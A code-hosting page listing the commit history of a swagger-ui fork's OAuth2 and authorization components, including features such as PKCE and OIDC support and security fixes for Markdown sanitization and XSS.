kyy/swagger-ui
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
5,311 Commits 1 Branch 0 Tags
c6d8d779d05cb2c0c44da982d50d9722ba28d812
Commit Graph

32 Commits

Author SHA1 Message Date
Christian Egli
c6d8d779d0 feat: do not ask for client secret when using auth code with PKCE (#7438) 
Co-authored-by: Ignacio Lozano <nacholozano@gmail.com>
Co-authored-by: Vladimir Gorej <vladimir.gorej@gmail.com>

Refs #6290
 2022-01-26 10:56:09 +01:00
Tim Lai
21c29469bc refactor(auth): rename auth flow constants to be more descriptive (#7061) 2021-03-10 15:53:14 -08:00
Ilya Lipnitskiy
0807687f91 feat(auth): Add OIDC support (#3517) (#6549) 
spec/actions.js: Add OIDC metadata fetching

components/auth/oauth2: Add OIDC URL to the Authorization popup
 2020-12-09 10:11:33 -08:00
Tim Lai
0a807d6237 fix(auth): support for oauth2 relative url (#6546) 
* Handle relative urls for oauth authorization

The full URL is computed based on the current selected server
if a relative URL is used as authorizationUrl
or tokenUrl


Co-authored-by: Eliot Berriot <contact@eliotberriot.com>
 2020-10-21 15:46:31 -07:00
Adam Stachowicz
65ea764b61 fix: add autofocus to auth fields (#6483) 2020-10-14 19:23:19 -07:00
Amir Bitaraf Haghighi
96aecc8860 feat: Preserve authorization on browser refresh and close/reopen (#5939) 
* Add default configuration `preserveAuthorization`

* Add localStorage to auth plugin

* Add persistAuthorization unit tests

* Refactor persistAuthorization to use wrapped actions

* Upgrade unit tests to be compatible with jest

* Add persistAuthorization documentation


Co-authored-by: Tim Lai <timothy.lai@gmail.com>
 2020-09-11 14:05:37 -07:00
Vladimir Gorej
a616cb471d fix(Markdown): render markdown in more secure way 
This commit changes markdown sanitization behaviour in following way:

class, style and data-* attributes are removed by default. These attributes
open possible vulnerability vectors to attackers.

The original behavior of sanitizer (before this commit) can be enabled by *useUnsafeMarkdown* configuration option.
Use this configuration option with caution and only in cases when you know
what you're doing.
 2020-06-11 21:51:15 +02:00
Matthew Morrissette
275c8f2ccf improvement: oauth "scopes" improvements (#6037) 
* improvement: oauth "scopes" init parameter

* improvement: add "select all" and "select none" to oauth scopes popup
 2020-06-10 11:27:54 -07:00
dalbrx-forcam
44acf85d0d improvement: use type 'password' instead of text for client secret (#5262) 
Co-authored-by: kyle shockey <kyleshockey@gmail.com>
 2020-01-11 17:26:54 -05:00
kyle
5f6ec8ce1d fix: mitigate "sequential @import chaining" vulnerability (#5616) 
* `test/e2e-cypress/tests/features/xss/` -> `test/e2e-cypress/tests/security`

* add tests

* filter <style> tags out of Markdown fields

* initialize OAuth inputs without applying `value` attribute
 2019-09-20 13:19:08 -07:00
kyle
a5568f9e16 improve: OAuth2 UI and test suite (via #5066) 
* create `features` folder

* add base oauth2 server

* continue implementing OAuth tests

* WIP

* add password flow tests

* modify Password flow credential types

* remove query string credential type

* add test case for Authorization flow

* add specific Authorization value for Password flow test

* WIP

* fix linter issues
 2018-12-07 20:54:29 +01:00
Charles Capps
861cc65cff improve: add "Close" button to OAuth dialog, rename "Done" button elsewhere (#4212) 
* Rename "Done" button to "Close", and add "Close" button OAuth dialog
* move Close button to the right
 2018-03-02 18:40:54 -08:00
Christoph Kappestein
774acb1f28 add flow to make scope checkbox id unqiue 2017-11-18 09:59:15 +01:00
Kyle Shockey
7c917325f0 Linter fixes 2017-10-20 19:31:52 -07:00
Kyle Shockey
d677e534c3 WIP 2017-10-13 21:23:45 -07:00
Kyle Shockey
8b81bcac48 OAS3 Auth MVP 2017-10-11 16:58:24 -07:00
RVKen
d36f0a6dbd fix eslint issues 2017-06-29 04:37:19 +02:00
Anna Bodnia
ee2e82390b fixes #3191 2017-06-08 15:41:06 +03:00
Anna Bodnia
36b263e230 fixes #3172 2017-06-08 12:19:47 +03:00
Kyle Shockey
6ccd037197 Merge branch 'bug/3163-markdown-xss' of github.com:shockey/swagger-ui into bug/3163-markdown-xss 2017-06-01 22:18:37 -07:00
Kyle Shockey
23b1a8aabd Finish rewiring Markdown provider 2017-06-01 21:41:28 -07:00
shockey
6ae7eb4591 Merge branch 'master' into bug/3163-markdown-xss 2017-06-01 09:47:12 -07:00
Kyle Shockey
df47e0e956 Disable HTML rendering in React-Markdown 2017-06-01 09:43:13 -07:00
Anna Bodnia
676fd99960 #3128 make request-body type default for aouth2 password flow 2017-05-31 18:53:45 +03:00
Anna Bodnia
8aebea34c4 add configuration of auth: scope separator, client id, client secret, app name, reaml, additionalQueryParams 2017-05-11 16:30:30 +03:00
Stefan Grootscholten
073eff4e10 Make the checkbox id more unique. 
If the swagger.json defines more than one oauth2 Security scheme with
matching scopes, the id of the scope checkboxes were not unique.
As a result the scope for a second security scheme could not be
selected.

By adding the security scheme name to the id, it becomes more unique.
 2017-05-04 09:39:22 +02:00
Anna Bodnia
bb73dd49d8 fixes password, application oauth2 flows 2017-04-26 17:50:09 +03:00
Anna Bodnia
5a260971cc fixes #2929 2017-04-21 13:29:18 +03:00
Mészáros Mihály
ae33b7f46a Implement application/client_credentials flow 2017-04-05 20:20:23 +02:00
Anna Bodnia
432cd7f965 #2774 display scopes for oauth2 password flow 2017-03-30 17:49:32 +03:00
Kyle Shockey
e1fcbfbf09 Linter error fixes 2017-03-23 16:36:45 -07:00
Ron
f22a628934 in with the new 2017-03-17 21:17:53 -07:00